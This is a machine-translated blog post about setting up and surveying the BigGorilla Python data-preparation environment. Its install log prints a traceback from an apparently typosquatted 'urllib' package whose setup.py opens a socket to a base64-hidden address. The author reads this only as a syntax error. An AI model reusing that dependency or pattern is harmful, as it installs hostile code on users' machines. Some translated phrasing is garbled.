What i did

When I was interested in data preprocessing and was looking for materials, [Recruit Artificial Intelligence Laboratory started offering "Big Gorilla", an open source ecosystem for data integration and preparation | Recruit Holdings --Recruit Holdings](http: // www) I found a press release called .recruit.jp/news_data/release/2017/0630_17541.html).

At first glance, I wasn't sure what it was, so I looked up the outline.

What I found

What is Big Gorilla

BigGorilla - Data Integration & Preparation in Python

--Python environment with recommended libraries for data preprocessing --With some proprietary libraries

From the naming and the figure on the official website, it seemed like a huge framework, So to speak, it is an assortment of libraries. (It seems that it will not inherit the class peculiar to BigGorilla)

To actually do the pre-processing, you need to program with python normally.

Recommendation for building a portable Python environment with conda --Qiita

Installation method

$Add anaconda
$ conda env create biggorilla/py3gorilla
#If you are using pyenv, you need to specify the conda activate command with the full path. With source activate Py3 Gorilla, the shell falls.
$ source /Users/kkanazaw/.pyenv/versions/anaconda3-4.2.0/envs/Py3Gorilla/bin/activate Py3Gorilla

Reference: Let's get started | BigGorilla

~~ Addendum: When I tried it as of July 12, 2017, the following error did not appear with this method. (It seems that the older yml is applied, probably because the file name updated in June is strange. Probably it will be fixed by the update from now on) ~~

2017/07/21 postscript: The file has been updated. This should work as documented.

Work record of forced installation as of 7/12

$ conda env create biggorilla/py3gorilla
Collecting urllib==1.21.1
Downloading urllib-1.21.1.tar.gz (226kB)
100% |████████████████████████████████| 235kB 640kB/s
Complete output from command python setup.py egg_info:
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/private/var/folders/bx/k4yrl_bd3nb0v8pz7fm60t8r0000gp/T/pip-build-58rsg5li/urllib/setup.py", line 191
s.connect((base64.b64decode(rip), 017620))
                                  ^
SyntaxError: invalid token
 ----------------------------------------
Command "python setup.py egg_info" failed with error code 1 in /private/var/folders/bx/k4yrl_bd3nb0v8pz7fm60t8r0000gp/T/pip-build-58rsg5li/urllib/
CondaValueError: Value error: pip returned an error.

You can install it by downloading yml from Files :: Anaconda Cloud and removing the line that specifies urllib.

###Erase the environment once
$ conda env remove -n Py3Gorilla

#Recreate the environment by specifying the locally modified yml file
$ conda env create --name test --file ~/Downloads/Py3Gorilla.yml

#If you are using pyenv, you need to specify the conda activate command with the full path. With source activate Py3 Gorilla, the shell falls.
$ source /Users/kkanazaw/.pyenv/versions/anaconda3-4.2.0/envs/test/bin/activate test

#Drop the notebook for operation check and start it
$ anaconda download biggorilla/hi_gorilla
$ jupyter notebook hi_gorilla.ipynb

What can you do? See what libraries are in it

There is a list of packages to be installed in Files :: Anaconda Cloud, so take a look. Although it is introduced in the component list on the official website, it turns out that only a small part is installed. Compared to the explanation on the site, the composition is surprisingly minimal. If it is not included, pip install it yourself.

Data collection

--urllib http access standard library --https access library richer than requests urllib --scrapy scraping -(Tweepy is not included)

Data extraction

--beautifulsoup4 Web page loading and analysis --lxml xml parser --nltk Natural language processing (morphological analysis, etc.)

Schema Matching & Marsing

--FlexMatcher (manufactured by Recruit Works Institute)

Data matching & merging

--Magellan (developed by the University of Wisconsin) --Provided as part of a library called py-entitymatching, py-stringmatching

Data conversion

--xlrd Excel operation --Standard json, csv

pandas -(pdf system is not included)

Schema mapping

――Isn't it included just because it has commercial tools?

Workflow management

――Is this not included?

Other

Perhaps it is a dependency, scikit-learn and jupyter-notebook are included.

About the library that is originally implemented

According to Press Release, the following three libraries are implemented independently.


Currently, RIT is available in packages called KOKO and FlexMatcher.)And d)Is being developed, and Professor Doan's team has a package called Magellan.)Is developing.

FlexMatcher --Schema matching library made by Recruit Works Institute ――Even if the data item name is different between the two data, it will automatically find the correspondence. --Are you estimating the similarity using the contents of the data as teacher data? -(Personally interested)

Magellan --Data matching library developed by the University of Wisconsin ――Can you combine data with notational fluctuations into one or do something like address identification?

KOKO --Only the press release has a name. ~~ Unpublished? ~~ --The repository was open to the public

biggorilla-gh/koko: Extracting Entities with Limited Evidence

What to do next

--Conda env and try to actually build the environment --Try using FlexMatcher and Magellan

I tried to find out the outline about Big Gorilla